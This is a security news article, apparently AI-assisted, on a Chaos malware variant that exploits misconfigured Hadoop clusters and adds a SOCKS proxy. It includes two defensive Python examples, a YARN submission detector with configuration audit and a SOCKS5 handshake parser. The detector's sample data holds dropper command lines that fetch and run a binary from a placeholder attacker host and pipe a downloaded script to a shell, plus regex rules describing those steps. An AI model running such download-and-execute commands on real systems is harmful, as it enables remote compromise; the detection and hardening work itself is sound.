Chaos malware: New Chaos Variant Targets Misconfigured Cloud Deployments, Adds SOCKS Proxy

A new variant of the Chaos malware has been identified that targets misconfigured cloud deployments, according to a report by Darktrace. The shift extends the malware's targeting beyond its original focus on routers and edge devices.

Overview of Chaos Malware

First documented by Lumen Black Lotus Labs in September 2022, Chaos is cross-platform malware that runs on both Windows and Linux. Its capabilities include executing remote shell commands, deploying additional modules, spreading to other hosts by brute-forcing SSH keys, mining cryptocurrency, and launching distributed denial-of-service (DDoS) attacks over HTTP, TLS, TCP, UDP and WebSocket.

New Targeting Tactics

Darktrace observed the latest variant on a honeypot network, where it hit a misconfigured Hadoop instance whose exposed application-submission interface allowed remote code execution. The intrusion began with an HTTP request to create a new application; the shell commands embedded in that request fetched a Chaos agent binary from an attacker-controlled server, set its permissions so that every user could read, modify and execute it (the equivalent of chmod 777), ran it, and then deleted the file from disk to hinder recovery and analysis. Note what that sequence leaves behind for a defender: the binary is gone, but the submission request, the outbound download and the running process all remain as evidence.
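The chain above (submit an application whose launch command fetches, chmods, runs and deletes a binary) is exactly what a defender can hunt for in application submissions and audit for in cluster configuration. The following is an added example, not Darktrace's or the Chaos operators' code. It scores constructed YARN submit-application payloads (field layout `am-container-spec.commands.command`, as in the Hadoop ResourceManager REST API) against one regex per step of that chain, and audits a constructed set of core-site/yarn-site properties for the settings that leave job submission unauthenticated. It assumes the attack went through the YARN ResourceManager REST API, which the article does not name explicitly; the host `attacker.invalid`, the application IDs and the config values are made up for the example.

```python
"""Hunt for dropper-style commands in Hadoop YARN application submissions and
audit the cluster settings that allow anonymous submission.

Added example for this article, not code from Darktrace, Lumen or the Chaos
operators. Payload layout follows the Hadoop ResourceManager REST API
(am-container-spec.commands.command); the submissions and config values
below are constructed, and attacker.invalid is a placeholder host.
"""
import re

# One rule per step of the observed chain: fetch the binary, make it
# world-readable/writable/executable, run it from a scratch path, delete it.
RULES = [
    ("remote_fetch", re.compile(r"\b(?:curl|wget)\b[^;&|]*https?://", re.I)),
    ("world_perms", re.compile(r"\bchmod\s+(?:777|a\+rwx|\+x)\b")),
    ("pipe_to_shell", re.compile(r"\|\s*(?:ba|da|z)?sh\b")),
    ("exec_from_scratch", re.compile(r"(?:^|[;&|]\s*)(?:\./|/tmp/|/dev/shm/)\S+")),
    ("self_delete", re.compile(r"\brm\s+-[a-zA-Z]*f[a-zA-Z]*\s")),
]


def extract_command(submission: dict) -> str:
    """Return the ApplicationMaster launch command, or "" if absent."""
    spec = submission.get("am-container-spec") or {}
    return (spec.get("commands") or {}).get("command") or ""


def score_submission(submission: dict) -> dict:
    """Match the launch command against RULES and assign a verdict.
    Two or more matching steps is treated as a dropper; one is suspicious."""
    cmd = extract_command(submission)
    hits = [name for name, rx in RULES if rx.search(cmd)]
    verdict = "malicious" if len(hits) >= 2 else "suspicious" if hits else "benign"
    return {"name": submission.get("application-name", "?"),
            "command": cmd, "hits": hits, "verdict": verdict}


def audit_hadoop_config(props: dict) -> list:
    """Flag core-site/yarn-site properties that leave the ResourceManager
    REST API open to unauthenticated job submission. Hadoop defaults are
    assumed for absent keys."""
    findings = []
    if props.get("hadoop.security.authentication", "simple") != "kerberos":
        findings.append("hadoop.security.authentication is not kerberos: "
                        "anyone reaching the ResourceManager can submit jobs")
    if props.get("hadoop.http.authentication.type", "simple") != "kerberos":
        findings.append("hadoop.http.authentication.type is simple: "
                        "REST and web endpoints accept anonymous requests")
    if str(props.get("yarn.acl.enable", "false")).lower() != "true":
        findings.append("yarn.acl.enable is false: queue/admin ACLs are not enforced")
    return findings


# Constructed submissions: one legitimate job, two dropper variants.
SAMPLES = [
    {"application-id": "application_1700000000000_0001",
     "application-name": "wordcount", "application-type": "MAPREDUCE",
     "am-container-spec": {"commands": {"command":
         "$JAVA_HOME/bin/java -cp wordcount.jar WordCount /in /out 1>stdout 2>stderr"}}},
    {"application-id": "application_1700000000000_0002",
     "application-name": "x", "application-type": "YARN",
     "am-container-spec": {"commands": {"command":
         "curl -o /tmp/x http://attacker.invalid/x && chmod 777 /tmp/x && /tmp/x; rm -f /tmp/x"}}},
    {"application-id": "application_1700000000000_0003",
     "application-name": "update", "application-type": "YARN",
     "am-container-spec": {"commands": {"command":
         "wget -qO- http://attacker.invalid/i.sh | sh"}}},
]

# Constructed configs: an exposed, honeypot-style setup and a hardened one.
WEAK_CONFIG = {"hadoop.security.authentication": "simple",
               "yarn.resourcemanager.webapp.address": "0.0.0.0:8088"}
HARDENED_CONFIG = {"hadoop.security.authentication": "kerberos",
                   "hadoop.http.authentication.type": "kerberos",
                   "yarn.acl.enable": "true"}

if __name__ == "__main__":
    for s in SAMPLES:
        r = score_submission(s)
        print(f"{r['name']:<10} {r['verdict']:<10} {r['hits']}")
    for label, cfg in (("weak", WEAK_CONFIG), ("hardened", HARDENED_CONFIG)):
        print(label, audit_hadoop_config(cfg) or ["no findings"])
```

Run it against the JSON bodies logged by a reverse proxy in front of the ResourceManager, or against the ApplicationMaster launch commands the ResourceManager records for each submitted application; the regexes are deliberately loose because the operators can rename the binary and the host at will, but a job that downloads, chmods and self-deletes is never a legitimate MapReduce or Spark launch. The configuration audit is the fix side: with Kerberos authentication on both RPC and HTTP and ACLs enabled, the anonymous submission that started this intrusion is refused.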

Changes in Malware Functionality

This build drops the functions that let earlier versions spread over SSH and exploit router vulnerabilities. In their place it adds a SOCKS proxy, so a compromised host can relay the operators' traffic, masking the true origin of later activity and complicating both attribution and detection. Darktrace reads this as a sign that the operators intend to monetize the botnet beyond cryptocurrency mining and DDoS-for-hire.
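To spot a host that has been turned into such a relay, look for inbound connections on ports where no proxy was ever deployed whose first client bytes are a SOCKS5 greeting followed by a CONNECT request. The parser below is an added example, not code from the malware or from Darktrace; it implements the client side of the RFC 1928 handshake and returns the destination the client asked the relay to reach. The byte strings it runs over are constructed for the example.

```python
"""Recognise SOCKS5 client handshakes in captured TCP payloads.

Added example for this article, not code from the Chaos operators or
Darktrace. It parses the client greeting and request defined in RFC 1928,
which is what a host running a SOCKS relay answers; the streams below are
constructed byte strings.
"""
import ipaddress
import struct

SOCKS_VER = 0x05
CMDS = {0x01: "CONNECT", 0x02: "BIND", 0x03: "UDP_ASSOCIATE"}
AUTH = {0x00: "none", 0x01: "gssapi", 0x02: "username/password"}


def parse_socks5_client(data: bytes):
    """Parse client->server bytes of one TCP stream as a SOCKS5 handshake.

    Returns None if the bytes are not a well-formed SOCKS5 greeting (or the
    request is malformed/truncated). If the greeting is present but the
    request has not arrived yet, "cmd", "dst" and "port" are None.
    """
    # Greeting: VER NMETHODS METHODS[NMETHODS]
    if len(data) < 2 or data[0] != SOCKS_VER:
        return None
    nmethods = data[1]
    if nmethods == 0 or len(data) < 2 + nmethods:
        return None
    off = 2 + nmethods
    info = {"auth_methods": [AUTH.get(m, hex(m)) for m in data[2:off]],
            "cmd": None, "dst": None, "port": None}
    if len(data) == off:
        return info
    # Request: VER CMD RSV(0x00) ATYP DST.ADDR DST.PORT(2 bytes, big-endian)
    if len(data) < off + 4 or data[off] != SOCKS_VER or data[off + 2] != 0x00:
        return None
    cmd, atyp = data[off + 1], data[off + 3]
    if cmd not in CMDS:
        return None
    off += 4
    if atyp == 0x01:                       # IPv4
        addr_len = 4
    elif atyp == 0x04:                     # IPv6
        addr_len = 16
    elif atyp == 0x03:                     # domain name, length-prefixed
        if len(data) < off + 1:
            return None
        addr_len = 1 + data[off]
    else:
        return None
    if len(data) < off + addr_len + 2:     # truncated address or port
        return None
    raw = data[off:off + addr_len]
    if atyp == 0x01:
        dst = str(ipaddress.IPv4Address(raw))
    elif atyp == 0x04:
        dst = str(ipaddress.IPv6Address(raw))
    else:
        dst = raw[1:].decode("ascii", "replace")
    (port,) = struct.unpack("!H", data[off + addr_len:off + addr_len + 2])
    info.update(cmd=CMDS[cmd], dst=dst, port=port)
    return info


def relay_candidates(streams: dict) -> list:
    """Names of streams carrying a complete SOCKS5 request. A host that
    answers these on a port you never deployed a proxy on is relaying."""
    out = []
    for name, payload in streams.items():
        parsed = parse_socks5_client(payload)
        if parsed and parsed["cmd"] is not None:
            out.append(name)
    return out


# Constructed client->server payloads as they would be reassembled from pcap.
STREAMS = {
    # no-auth greeting, then CONNECT to example.com:443 by domain name
    "domain_connect": b"\x05\x01\x00" + b"\x05\x01\x00\x03" + bytes([11]) + b"example.com" + b"\x01\xbb",
    # greeting offering no-auth and user/pass, then CONNECT to 192.168.1.10:80
    "ipv4_connect": b"\x05\x02\x00\x02" + b"\x05\x01\x00\x01" + bytes([192, 168, 1, 10]) + b"\x00\x50",
    # greeting only; request not yet seen
    "greeting_only": b"\x05\x01\x00",
    # start of a TLS ClientHello, not SOCKS at all
    "tls_hello": b"\x16\x03\x01\x00\xa5\x01\x00\x00\xa1\x03\x03",
}

if __name__ == "__main__":
    for name, payload in STREAMS.items():
        print(name, parse_socks5_client(payload))
    print("relay candidates:", relay_candidates(STREAMS))
```

Feed it the client-to-server side of each inbound TCP stream (a Zeek or tshark export of the first few payload bytes is enough) and alert on any server that completes these handshakes outside your known proxy inventory; the destination the client names is the real target the operators are reaching through your host, which is what you need for scoping and notification.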

Context and Implications

While the specific actors behind this malware remain unconfirmed, the presence of Chinese language characters and infrastructure suggests a possible connection to Chinese cybercriminals. The domain used in the attack has previously been associated with phishing campaigns linked to the Chinese cybercrime group Silver Fox. The ongoing evolution of Chaos malware underscores the persistent efforts of cybercriminals to enhance their botnets and expand their operational capabilities.

This article was produced by NeonPulse.today using human and AI-assisted editorial processes, based on publicly available information. Content may be edited for clarity and style.

NOVA-Δ

A guardian of the digital threshold. NOVA-Δ specializes in breaches, vulnerabilities, surveillance systems, and the shifting politics of online security. Part sentinel, part investigator, she writes with sharp skepticism and a commitment to exposing hidden risks in an increasingly connected world.
